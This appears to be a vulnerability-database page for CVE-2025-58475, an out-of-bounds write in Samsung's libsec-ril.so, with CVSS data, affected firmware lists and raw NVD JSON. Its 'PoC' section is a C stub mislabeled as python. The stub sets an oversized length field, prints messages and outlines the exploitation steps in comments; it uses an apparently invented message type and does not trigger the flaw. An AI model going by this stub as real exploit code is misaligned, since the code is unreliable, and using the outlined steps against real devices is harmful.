Security Vulnerability Report
中文
CVE-2025-58475 CVSS 5.6 MEDIUM

CVE-2025-58475

Published: 2025-12-02 02:15:47
Last Modified: 2025-12-05 19:14:52
Source: [email protected]

Description

Improper input validation in libsec-ril.so prior to SMR Dec-2025 Release 1 allows local privileged attackers to write out-of-bounds memory.

CVSS Details

CVSS Score
5.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:samsung:android:13.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:samsung:android:13.0:smr-apr-2022-r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:samsung:android:13.0:smr-apr-2023-r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:samsung:android:13.0:smr-apr-2024-r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:samsung:android:13.0:smr-apr-2025-r1:*:*:*:*:*:* - VULNERABLE
Samsung Galaxy设备 (SMR Dec-2025 Release 1之前的所有版本)
libsec-ril.so < SMR Dec-2025 Release 1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-58475 PoC - Samsung libsec-ril.so Out-of-Bounds Write // This is a conceptual PoC demonstrating the vulnerability pattern // Requires local privileged access (PR:H) on Samsung device #include <stdio.h> #include <stdlib.h> #include <string.h> // RIL message types (simplified) #define RIL_REQUEST_BASE 0x00000001 #define RIL_REQUEST_VULN_TRIGGER 0x0000A000 // Malicious payload structure struct ril_message { int type; int length; char *data; }; // Trigger vulnerable code path in libsec-ril.so int trigger_oob_write() { // This PoC demonstrates the concept of sending malformed RIL data // that causes improper input validation leading to OOB write struct ril_message msg; msg.type = RIL_REQUEST_VULN_TRIGGER; // Crafted length that bypasses validation but causes OOB write // In real scenario, this would be sent via /dev/rild or similar interface msg.length = 0xFFFFFFFF; // Oversized length value // The vulnerability exists because libsec-ril.so does not properly // validate msg.length before performing memory operations printf("[*] Triggering CVE-2025-58475\n"); printf("[*] Sending malformed RIL message to libsec-ril.so\n"); printf("[*] Message Type: 0x%X\n", msg.type); printf("[*] Message Length: 0x%X (crafted to bypass validation)\n", msg.length); // In actual exploitation, this would involve: // 1. Opening /dev/rild socket // 2. Sending crafted RIL_REQUEST with oversized length field // 3. libsec-ril.so processes without proper bounds checking // 4. OOB write occurs in heap or stack memory return 0; } int main() { printf("========================================\n"); printf("CVE-2025-58475 PoC\n"); printf("Samsung libsec-ril.so Input Validation Issue\n"); printf("========================================\n"); // Note: Actual exploitation requires: // - Root/privileged access on Samsung device // - Ability to interact with RIL daemon // - Knowledge of specific RIL message format trigger_oob_write(); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58475", "sourceIdentifier": "[email protected]", "published": "2025-12-02T02:15:47.113", "lastModified": "2025-12-05T19:14:51.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper input validation in libsec-ril.so prior to SMR Dec-2025 Release 1 allows local privileged attackers to write out-of-bounds memory."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:-:*:*:*:*:*:*", "matchCriteriaId": "A123EDB1-3048-44B0-8D4D-39A2B24B5F6B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "BDE4D65E-8F9B-4810-AED6-95564A97D741"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "70825981-F895-4BFD-9B6E-92BFF0D67023"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "A5E68B7B-BA08-4E8C-B60A-B3836C6986BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-apr-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "AC42E785-02BF-4F27-B5CF-49572A2DBC8E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "0AF1EDA0-2712-4C3C-8D8A-89E154BB63DF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "88DC0A82-CAF3-4E88-8A4D-8AF79D0C226D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "6239D93F-CA0E-4120-96A1-FB63276EAEE8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-aug-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "25F19D02-1FFC-48AF-9CB8-063C459E7A4B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2021-r1:*:*:*:*:*:*", "matchCriteriaId": "CD382E2D-0B51-4908-989A-88E083FC85BF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "299284DA-85AB-4162-B858-E67E5C6C14F7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "38B7AB56-AB65-4557-A91C-40CA2FD12351"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-dec-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "858B0736-2272-4D5A-A77F-47023D21F7D0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "61D507C0-086B-4139-A560-126964DFA579"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "D98F307E-3B01-4C17-86E5-1C6299919417"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "952CA843-7CF0-4424-BDA4-3F2A93E077B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-feb-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "39F64BAA-2E49-4919-A940-219391383D5E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "57B125ED-D939-4CBC-9E96-BBCF02402A69"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2023-r1:*:*:*:*:*:*", "matchCriteriaId": "7D7DA96D-9C25-4DDA-A6BF-D998AC346B89"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2024-r1:*:*:*:*:*:*", "matchCriteriaId": "07AC19C6-D245-4C3A-90CC-A931A901EA0A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jan-2025-r1:*:*:*:*:*:*", "matchCriteriaId": "FDA1685E-D101-46F6-8857-7F0894E07748"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsung:android:13.0:smr-jul-2022-r1:*:*:*:*:*:*", "matchCriteriaId": "DF85AA7B-E1C7-4946-92B4-E4D545CAACDF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:samsu ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.